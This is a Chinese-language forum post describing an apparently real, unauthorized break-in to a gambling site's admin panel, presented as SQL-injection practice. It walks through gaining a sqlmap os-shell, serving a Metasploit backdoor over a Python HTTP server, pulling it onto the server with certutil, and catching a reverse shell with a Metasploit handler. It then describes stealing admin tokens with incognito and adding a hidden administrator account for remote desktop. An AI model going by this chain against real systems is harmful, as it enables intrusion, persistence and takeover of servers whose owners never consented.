跳转到帖子

对非法网站的一次提权

recommended_posts

发布于
  • Members

0x01  收集信息

因为主要想练习sql注入,所以信息收集做的比较简单:

通过fofa找到相关cms,这里发现棋牌后台登录处存在SQL注入漏洞

0ld345xvueu9582.png

0x02  漏洞利用

1.利用sqlmap一把梭,并获取os-shell

vdjxkskosrt9583.png

2.利用python搭建一个简单的http服务器,并挂载MSF生成的后门文件

python -m SimpleHTTPServer

0k3lyek1x5j9584.png

3.os-shell下远程下载后门执行程序

在os-shell下通过命令创建一个目录

mkdir  C:\test

在os-shell下通过certutil命令远程下载后门文件到服务器上

gwtqv15amrz9585.jpg5b0lars4alg9586.jpg4.执行msf反弹shell

 use exploit/mulit/hander

set lhost 接收反弹shell的ip

 run 

zi4vhzsuixb9587.jpgmuuel4hotyj9588.jpg

5.成功进入该服务器

这时发现我们只有gust权限 难受

6.对目标服务器进行提权

提权方法:内核提权以及窃取管理tokens提权


本文只利用窃取管理tokens提权 

使用use incognito来加载会话令牌模块

然后list_tokens -u来列出会话令牌

agppb5ctd2d9589.png

7.创建用户

命令:net user 用户名 密码 /add

1geclg4dnjr9590.png

ixbki00qvyq9591.png


0x03  渗透总结

1.通过SQLmap获取os-shell2.在msf下生产后门文件3.通过python -m SimpleHTTPServer 搭建http服务器,并将生成的后门文件拷贝到到http服务器目录下。2.在os-shell模式下创建目录,并通过certutil远程下载http服务器上的后门。4.通过MSF反弹shell。在MSF下添加用户以及添加到管理员组,可远程桌面登录
  • 查看数 716
  • 已创建
  • 最后回复

参与讨论

你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。

游客
回帖…